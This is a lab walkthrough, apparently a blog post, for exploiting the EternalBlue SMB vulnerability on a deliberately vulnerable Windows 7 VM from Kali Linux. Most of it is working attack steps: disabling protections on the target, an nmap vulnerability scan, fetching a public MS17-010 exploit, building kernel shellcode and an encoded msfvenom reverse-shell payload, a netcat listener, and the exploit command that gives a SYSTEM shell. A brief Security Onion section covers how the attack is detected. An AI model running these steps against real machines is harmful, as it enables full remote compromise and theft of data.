Exploitation with Eternalblue : Win7

What is Eternalblue?

It’s a software vulnerability in Microsoft windows OS works by exploiting Microsoft Server Message Block 1.0 (SMB) on various Microsoft Windows versions.
SMB or Server Message block is a network file sharing protocol, which allow applications on a computer to read and write to files and to request services on the same network.

How  Eternalblue Exploit works ?

It allow us to write and overwrite the memory by sending large buffer into the SMB1 buffer. Then kernal memory pool is organized and makes the RIP pointer point to the overwritten memory to read and execute our payload.

We are going to use a standalone Eternalblue exploit model using python. This is a bufferoverflow, which allow us to attack a vulnerable Win7 VM and give us the system-level cmd.exe shell.

What we need :
Win7 VM (Vulnerable Machine)
Kali linux (Attack Machine )
(Optional) Security Onion (Sniffing Interface between Kali and Win 7)

Kali VM IP :

Win7 VM IP:

In Win7 VM :
1) Open command prompt as an administrator
2) Type: powershell
3) To enable SBM version 1, type:
Set-ItemProperty -Path”HKLM:SYSTEMCurrentControlSetServicesLammanServerParameters” SMB1 -Type DWORD -Value 1 -Force
4) Disable Firewall

At this point, our Win7 VM is vulnerable to Eternalblue.

(Optional) In Security Onion:
Set Security Onion, network adapter in promiscuous mode. Security Onion will ack as an Sniffing interface between Kali VM and Win7 VM.

In terminal, type:
$ sudo tcpdump -nnttttAi eth0

It will start sniffing on that interface.

In Kali VM:
1) Ping to Win7 IP, to check connections.
2) Do nmap to check whether Win7 is vulnerable to nse script which is related to SMB vulnerabilities.
3) Open terminal, and type:
$ nmap -p 445 –Script smb-vuln*

This says that Win7 vulnerable, let’s test it out.

Download the Eternalblue MS17-010 from the github,
link: https://github.com/worawit/MS17-010.

Unzip the file and go to the download folder in the terminal where it will have all the file from the downloaded zip file and run the following command:

$ nasm -f bin eternalblue_kshellcode_x86.asm

This will generate a malicious payload that allow us to get a reverse shell from Win7 VM to Kali VM.

$ msfvenom -p windows/shell_reverse_tcp -a x86 –platform windows -e x86/shikata_ga_nai -f raw -o meterpreterx86.bin EXITFUNC=thread LHOST= LPORT=4444 -b x00x0ax0d

< Shikata ga nai : it can’t be helped 😛>

$ cat eternalblue_kshellcode_x86 meterpreterx86.bin > sc_x86.bin

Open a new windows in Kali VM, and for netcat to start listening to (4444) this port.
$  nc -nlvp 4444
Back to old terminal where we were running our payload and run the following command.
$ python eternalblue_exploit7.py sc_x86.bin
While running this command, my Win7 VM has been crashed, you may encounter with this issue, as we are running a buffer overflow. If it doesn’t then you will get the system level access to the Win7. If it has crashed, let the Win7 system reboots and run the last command in kali again, and you will see something like this, in the terminal where we were doing netcat.
Check your Win7 VM, to verify that we got shell level access.
Voilà, 😈 you have compromised Win7 VM. 
In Security Onion: 
(Optional, but if you wanna know about rules and alerts, here you go. 😎)
Now, we go to Security Onion to Check, what type of snort alert has been occurred in result of this exploitation.
Open Squert, login with your credentials and you will see something like this. 
Open any alert, you will see rules type, check it’s hex value. These rule alerts says that a exploit has been performed. 
To verify that our exploit was successful, we will check our pcap, which we were generating with tcpdump in Security Onion.
Open terminal and type the following command:
$ tcpdump -nnttttAr eternalblue.pcap | less -Sr
You can see, we get the SMB vulnerability , running at port 445.
Here, we have got the Win7 access:
As you can see in the pcap, we have got the system level access. It shows us in plain text. It’s the same as what we have with win7 VM, command prompt. 

